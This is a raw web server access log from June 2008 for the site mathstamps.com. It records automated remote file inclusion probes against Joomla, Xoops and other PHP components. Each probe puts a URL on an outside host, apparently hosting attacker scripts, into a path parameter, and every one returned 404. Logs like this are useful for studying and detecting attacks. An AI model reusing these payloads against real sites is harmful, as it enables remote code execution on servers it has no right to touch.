69.70.80.22 - - [01/Jun/2008:19:35:07 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:35:58 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:35:58 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:36:03 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:36:04 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:36:41 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:36:41 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
201.11.76.34 - - [01/Jun/2008:19:36:50 -0700] "GET /logs/access_080512.log/index.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cmd.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
201.11.76.34 - - [01/Jun/2008:19:36:51 -0700] "GET /logs/index.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cmd.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:37:00 -0700] "GET /logs/access_080303.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:37:00 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:37:00 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:37:07 -0700] "GET /logs/access_080505.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:37:07 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
69.61.37.87 - - [01/Jun/2008:19:37:23 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:37:46 -0700] "GET /logs/access_080421.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
206.221.179.200 - - [01/Jun/2008:19:38:13 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
206.221.179.200 - - [01/Jun/2008:19:38:14 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
74.6.18.225 - - [01/Jun/2008:19:38:27 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
64.185.237.149 - - [01/Jun/2008:19:39:47 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.205.74.80 - - [01/Jun/2008:19:41:32 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:19:42:07 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:46:07 -0700] "GET /logs/access_080414.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:48:13 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:48:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:48:49 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:48:49 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:48:51 -0700] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:48:52 -0700] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:48:56 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:19:48:57 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:50:13 -0700] "GET /logs/access_080414.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:52:38 -0700] "GET /logs/access_080428.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:52:38 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:52:39 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
206.221.179.200 - - [01/Jun/2008:19:53:12 -0700] "GET //ecrire.php?lang=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
206.221.179.200 - - [01/Jun/2008:19:53:12 -0700] "GET /logs//ecrire.php?lang=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
58.26.137.64 - - [01/Jun/2008:19:54:10 -0700] "GET /logs/send_reminders.php?includedir=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
58.26.137.64 - - [01/Jun/2008:19:54:10 -0700] "GET /send_reminders.php?includedir=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
200.1.202.61 - - [01/Jun/2008:19:54:30 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.1.202.61 - - [01/Jun/2008:19:54:32 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:19:55:01 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:19:55:03 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:19:55:03 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:19:55:05 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:19:55:06 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:19:55:06 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:19:55:17 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:19:55:18 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:19:55:18 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:19:55:18 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:19:55:19 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:19:55:21 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:55:47 -0700] "GET /logs/access_080407.log/convert/mvcw.php?vwar_root=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:55:48 -0700] "GET /convert/mvcw.php?vwar_root=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:55:48 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:57:42 -0700] "GET /logs/access_080512.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:58:18 -0700] "GET /logs/access_080407.log/convert/mvcw.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:58:18 -0700] "GET /convert/mvcw.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:58:19 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.246.63.121 - - [01/Jun/2008:19:58:50 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
216.246.63.121 - - [01/Jun/2008:19:58:50 -0700] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
80.154.38.121 - - [01/Jun/2008:19:59:07 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:19:59:07 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:19:59:12 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:19:59:17 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:19:59:17 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:19:59:26 -0700] "GET /logs/access_080428.log/convert/mvcw.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:00:33 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:00:34 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:00:34 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:01:53 -0700] "GET /logs/access_080428.log/joomla/index.php?option=com_restaurante&task=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.63.121 - - [01/Jun/2008:20:03:20 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
216.246.63.121 - - [01/Jun/2008:20:03:21 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:03:35 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:03:42 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:05:40 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:05:40 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:05:41 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:06:18 -0700] "GET /logs/access_080414.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:06:18 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:06:19 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.10.199.146 - - [01/Jun/2008:20:06:23 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.taktikshooter.com/hubert/extern/layout/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
58.26.137.64 - - [01/Jun/2008:20:07:37 -0700] "GET /logs/send_reminders.php?includedir=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
58.26.137.64 - - [01/Jun/2008:20:07:38 -0700] "GET /send_reminders.php?includedir=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
84.21.71.133 - - [01/Jun/2008:20:07:40 -0700] "GET /logs/access_080428.log/joomla/index.php?option=com_restaurante&task=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.13.224.83 - - [01/Jun/2008:20:09:05 -0700] "GET /logs/access_080512.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.13.224.83 - - [01/Jun/2008:20:09:05 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.13.224.83 - - [01/Jun/2008:20:09:05 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.116.44.60 - - [01/Jun/2008:20:10:25 -0700] "GET /logs/access_080512.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
208.116.44.60 - - [01/Jun/2008:20:10:25 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
208.116.44.60 - - [01/Jun/2008:20:10:26 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:20:10:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:20:10:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
67.205.74.80 - - [01/Jun/2008:20:10:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.96.130 - - [01/Jun/2008:20:10:51 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
67.205.74.80 - - [01/Jun/2008:20:10:51 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
